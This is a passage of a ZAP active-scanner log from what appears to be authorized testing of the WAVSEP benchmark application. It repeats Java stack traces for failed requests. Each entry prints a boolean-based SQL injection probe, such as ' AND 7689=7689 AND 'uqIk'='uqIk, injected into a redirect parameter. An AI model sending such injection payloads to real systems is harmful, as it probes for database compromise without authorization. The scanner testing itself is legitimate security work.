http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') AND 5906=6400 AND ('zUcM'='zUcM at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679201 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8078=5663 AND ('hRWl'='hRWl] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt') AND 8078=5663 AND ('hRWl'='hRWl at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679201 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 3630=9477 AND 'VLFr'='VLFr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 3630=9477 AND 'VLFr'='VLFr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679203 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7906=7219 AND 'GaVw'='GaVw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7906=7219 AND 'GaVw'='GaVw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679203 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 7689=7689 AND 'uqIk'='uqIk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 7689=7689 AND 'uqIk'='uqIk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679204 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7957=7957 AND 'KkuO'='KkuO] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7957=7957 AND 'KkuO'='KkuO at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679204 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [' AND 3630=9477 AND 'VLFr'='VLFr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/' AND 3630=9477 AND 'VLFr'='VLFr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679205 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7906=7219 AND 'GaVw'='GaVw] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt' AND 7906=7219 AND 'GaVw'='GaVw at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679205 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 5798=8456 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 5798=8456 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679206 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5076=3909 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5076=3909 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679207 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 2341=2341 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 2341=2341 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679207 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4435=4435 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 4435=4435 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679208 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' AND 5798=8456 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' AND 5798=8456 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679209 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5076=3909 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt%' AND 5076=3909 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9679210 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ AND 5558=4665-- uNzr] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ AND 5558=4665-- uNzr at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 